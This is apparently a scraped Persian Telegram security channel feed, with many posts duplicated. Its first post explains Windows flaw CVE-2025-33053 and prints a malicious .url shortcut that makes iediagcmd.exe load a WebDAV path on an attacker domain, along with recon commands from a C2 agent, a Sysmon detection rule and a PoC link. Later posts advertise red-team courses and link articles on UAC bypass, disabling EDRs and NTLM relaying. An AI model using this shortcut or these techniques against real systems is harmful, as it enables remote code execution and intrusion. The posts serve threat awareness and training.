با سلام و وقت بخیر،
یکی از آسیبپذیریهای جدید که اخیراً مورد سوءاستفاده قرار گرفته، آسیبپذیری CVE-2025-33053 میباشد. این آسیبپذیری از طریق استفاده از فایلهای .url (InternetShortcut) و ابزار داخلی ویندوز iediagcmd.exe، امکان اجرای غیرمستقیم کد را فراهم میکند.
بهطور خاص، مهاجم فایلی با محتوای زیر ایجاد میکند:
ابزار iediagcmd.exe فایل را باز کرده و با توجه به تنظیمات آن، سیستم تلاش میکند تا مسیر WorkingDirectory را از طریق WebDAV بارگذاری کند. این رفتار باعث میشود تا امکان اجرای کد مخرب از راه دور فراهم شود.
یکی از آسیبپذیریهای جدید که اخیراً مورد سوءاستفاده قرار گرفته، آسیبپذیری CVE-2025-33053 میباشد. این آسیبپذیری از طریق استفاده از فایلهای .url (InternetShortcut) و ابزار داخلی ویندوز iediagcmd.exe، امکان اجرای غیرمستقیم کد را فراهم میکند.
بهطور خاص، مهاجم فایلی با محتوای زیر ایجاد میکند:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
ابزار iediagcmd.exe فایل را باز کرده و با توجه به تنظیمات آن، سیستم تلاش میکند تا مسیر WorkingDirectory را از طریق WebDAV بارگذاری کند. این رفتار باعث میشود تا امکان اجرای کد مخرب از راه دور فراهم شود.
❤14
طبق گزارش Check Point، یک گروه APT با استفاده از این روش بدافزار خود را اجرا کرده و کنترل سیستم را به دست گرفتهاند. شواهد نشان میدهد C2 مورد استفاده یکی از اجنتهای Mythic بوده و دستورات زیر توسط آن اجرا شدهاند:
یک رول پایه برای شناسایی url
و اما poc آسیب پذیری:
https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept
ipconfig.exe /all
netsh.exe in tcp show global
netsh.exe advfirewall firewall show rule name=all verbose
route.exe print
یک رول پایه برای شناسایی url
index=sysmon EventCode=1
(Image="*iediagcmd.exe" OR CommandLine="*iediagcmd.exe*")
AND (CommandLine="*@ssl@443*" OR CommandLine="*DavWWWRoot*" OR CommandLine="*summerartcamp*")
و اما poc آسیب پذیری:
https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept
GitHub
GitHub - DevBuiHieu/CVE-2025-33053-Proof-Of-Concept: CVE-2025-33053 Proof Of Concept (PoC)
CVE-2025-33053 Proof Of Concept (PoC). Contribute to DevBuiHieu/CVE-2025-33053-Proof-Of-Concept development by creating an account on GitHub.
❤9🗿1
Fortinet Fixes Critical SQL Injection Flaw in FortiWeb (CVE-2025-25257, CVSS 9.6)
https://securityonline.info/fortinet-fixes-critical-sql-injection-flaw-in-fortiweb-cve-2025-25257-cvss-9-6/
https://securityonline.info/fortinet-fixes-critical-sql-injection-flaw-in-fortiweb-cve-2025-25257-cvss-9-6/
❤3😈1
RTO.pdf
96.2 KB
دوره RTO
شروع دوره 17 مرداد مدت زمان دوره در 4 جلسه 8 ساعته که کلا 32 ساعت روزهای برگزاری جمعه ها 8 تا 16
دوره به صورت آنلاین میباشد. در صورتی که سرفصل تکمیل نشود تایم اضافه خواهد شد.
دوره به صورت عملی با سناریو شبیه سازی APT بر روی LAB شخصی سازی شده میباشد.
سرفصل ضمیمه شد هر روز شامل چندین موضوع میباشد که همراه با حل تمرین در لب میباشد.
قیمت دوره 15 تومن
نمونه تدریس
https://www.youtube.com/@soheilsec/playlists
سوال در مورد دوره @soheilsec
شروع دوره 17 مرداد مدت زمان دوره در 4 جلسه 8 ساعته که کلا 32 ساعت روزهای برگزاری جمعه ها 8 تا 16
دوره به صورت آنلاین میباشد. در صورتی که سرفصل تکمیل نشود تایم اضافه خواهد شد.
دوره به صورت عملی با سناریو شبیه سازی APT بر روی LAB شخصی سازی شده میباشد.
سرفصل ضمیمه شد هر روز شامل چندین موضوع میباشد که همراه با حل تمرین در لب میباشد.
قیمت دوره 15 تومن
نمونه تدریس
https://www.youtube.com/@soheilsec/playlists
سوال در مورد دوره @soheilsec
❤23🗿3👌2🤔1🆒1
سلام وقت بخیر،
ویدیو معرفی دوره پاسخ به سوالهایی که مطرح شد.
https://youtu.be/va9LZ3noBTc
جهت ثبت نام در دوره و سوالی دارید که پاسخ داده نشده @soheilsec
ویدیو معرفی دوره پاسخ به سوالهایی که مطرح شد.
https://youtu.be/va9LZ3noBTc
جهت ثبت نام در دوره و سوالی دارید که پاسخ داده نشده @soheilsec
YouTube
دوره ردتیم با sliver c2
توضیحات بیشتر و ثبت نام در دوره
https://t.iss.one/learnpentest/1087
==========================================
آدرس سایت و شبکه های اجتماعی
https://www.soheilsec.com/
https://twitter.com/soheilsec
https://www.instagram.com/soheilsec/
https://www.linkedin.com/…
https://t.iss.one/learnpentest/1087
==========================================
آدرس سایت و شبکه های اجتماعی
https://www.soheilsec.com/
https://twitter.com/soheilsec
https://www.instagram.com/soheilsec/
https://www.linkedin.com/…
❤5👍2😈1🆒1
FULLY OPERATIONAL: STUXNET 15 YEARS LATER AND THE EVOLUTION OF CYBER THREATS TO CRITICAL INFRASTRUCTURE.
https://homeland.house.gov/hearing/fully-operational-stuxnet-15-years-later-and-the-evolution-of-cyber-threats-to-critical-infrastructure/
https://homeland.house.gov/hearing/fully-operational-stuxnet-15-years-later-and-the-evolution-of-cyber-threats-to-critical-infrastructure/
❤3
Forwarded from Try Hack Box
💻 به تیم مدرسان TryHackBox بپیوندید!
تیم TryHackBox در حال گسترش تیم مدرسان خود است و از متخصصان حوزه امنیت سایبری، تست نفوذ، تیم قرمز (Red Team) و تیم دفاعی (Blue Team) دعوت میکند تا به ما بپیوندند.
اگر شما تجربه عملی و تخصص در یکی از حوزههای امنیت سایبری دارید و علاقهمند به انتقال دانش و تجربیات خود به دیگران هستید.
همچنین اگر میخواهید در یک جامعه آموزشی پویا و حرفهای فعالیت کنید، ما فرصتی ایدهآل برای شما داریم
در کنارتان هستیم تا دورههای آموزشی خود را طراحی و تدریس کنید و از حمایت تیم ما برای تولید محتوای باکیفیت بهرهمند شوید.
همچنین درآمدی متناسب با مهارتهای خود داشته باشید و در رشد جامعه امنیت سایبری نقش مؤثری ایفا کنید.
درصورت تمایل رزومه خود را برای ما ارسال کنید.
Telegram: @TryHackBoxBot
Gmail: [email protected]
تیم TryHackBox در حال گسترش تیم مدرسان خود است و از متخصصان حوزه امنیت سایبری، تست نفوذ، تیم قرمز (Red Team) و تیم دفاعی (Blue Team) دعوت میکند تا به ما بپیوندند.
اگر شما تجربه عملی و تخصص در یکی از حوزههای امنیت سایبری دارید و علاقهمند به انتقال دانش و تجربیات خود به دیگران هستید.
همچنین اگر میخواهید در یک جامعه آموزشی پویا و حرفهای فعالیت کنید، ما فرصتی ایدهآل برای شما داریم
در کنارتان هستیم تا دورههای آموزشی خود را طراحی و تدریس کنید و از حمایت تیم ما برای تولید محتوای باکیفیت بهرهمند شوید.
همچنین درآمدی متناسب با مهارتهای خود داشته باشید و در رشد جامعه امنیت سایبری نقش مؤثری ایفا کنید.
درصورت تمایل رزومه خود را برای ما ارسال کنید.
Telegram: @TryHackBoxBot
Gmail: [email protected]
❤3
Extending AD CS attack surface to the cloud with Intune certificates
https://dirkjanm.io/extending-ad-cs-attack-surface-intune-certs/
https://dirkjanm.io/extending-ad-cs-attack-surface-intune-certs/
dirkjanm.io
Extending AD CS attack surface to the cloud with Intune certificates
Active Directory Certificate Services (AD CS) attack surface is pretty well explored in Active Directory itself, with *checks notes* already 16 “ESC” attacks being publicly described. Hybrid certificate attack paths have not gained that much attention yet…
Forwarded from Sec Note
Linkedin
Sec Note | Alireza Hosseini
مدتی بود روی باجافزارها (از نظر سرعت، تکنیکها و روشهای رمزنگاری) مطالعه میکردم. یکی از نکات جالبی که دیدم این بود که تقریباً همه این خانوادهها قبل از رمزگذاری، Shadow Copies و بکاپها رو پاک میکنن.
اما یک سؤال برام پیش اومد: برای حذف بکاپها نیاز…
اما یک سؤال برام پیش اومد: برای حذف بکاپها نیاز…
❤3🗿2
The Hacker's Renaissance: A Manifesto Reborn
https://phrack.org/issues/72/19#article
https://phrack.org/issues/72/19#article
Phrack
The Hacker's Renaissance - A Manifesto Reborn
Click to read the article on phrack
Active Directory.pdf
47.3 KB
دوره AD for hackers
شروع دوره 20 شهریور مدت زمان دوره 2 جلسه 8 ساعته که 16 ساعت میباشد.
روزهای برگزار دوره پنجشنبهها 8 تا 16
دوره به صورت آنلاین میباشد.
دوره با محوریت پوشش مفاهیم حملات در اکتیو میباشد.
سرفصل ضمیمه شده است.
قیمت دوره 6 تومن
شروع دوره 20 شهریور مدت زمان دوره 2 جلسه 8 ساعته که 16 ساعت میباشد.
روزهای برگزار دوره پنجشنبهها 8 تا 16
دوره به صورت آنلاین میباشد.
دوره با محوریت پوشش مفاهیم حملات در اکتیو میباشد.
سرفصل ضمیمه شده است.
قیمت دوره 6 تومن
❤10🗿6🤔2
Forwarded from Sec Note
This media is not supported in your browser
VIEW IN TELEGRAM
UAC Bypass Chain Leading To Silent Elevation
👾 The Presentation Video
My Blog:
https://binary-win.github.io/2025/08/22/UAC-Bypass.html
👾 The Presentation Video
My Blog:
https://binary-win.github.io/2025/08/22/UAC-Bypass.html
👍6❤2
NTLMv1: NTLMv1 is removed starting in Windows 11, version 24H2 and Windows Server 2025.
https://learn.microsoft.com/en-us/windows/whats-new/whats-new-windows-11-version-24h2#features-removed-in-windows-11-version-24h2
https://learn.microsoft.com/en-us/windows/whats-new/whats-new-windows-11-version-24h2#features-removed-in-windows-11-version-24h2
Docs
What's new in Windows 11, version 24H2 for IT pros
Learn more about what's new in Windows 11 version 24H2, including servicing updates, Windows Subsystem for Linux, the latest CSPs, and more.
👌1
Countering EDRs With The Backing Of Protected Process Light (PPL)
https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html?m=1
https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html?m=1
Zerosalarium
Countering EDRs With The Backing Of Protected Process Light (PPL)
Abusing the Clipup.exe program by using the CreateProcessAsPPL.exe tool to destroy the executable file of the EDRs, Antivirus.
❤1👍1
Operating Outside the Box: NTLM Relaying Low-Privilege HTTP Auth to LDAP
https://specterops.io/blog/2025/08/22/operating-outside-the-box-ntlm-relaying-low-privilege-http-auth-to-ldap/
https://specterops.io/blog/2025/08/22/operating-outside-the-box-ntlm-relaying-low-privilege-http-auth-to-ldap/
SpecterOps
Operating Outside the Box: NTLM Relaying Low-Privilege HTTP Auth to LDAP - SpecterOps
TL;DR When operating out of a ceded access or phishing payload with no credential material, you can use low-privilege HTTP authentication from the current user context to perform a proxied relay to LDAP, then execute tooling through the SOCKS5 proxy to complete…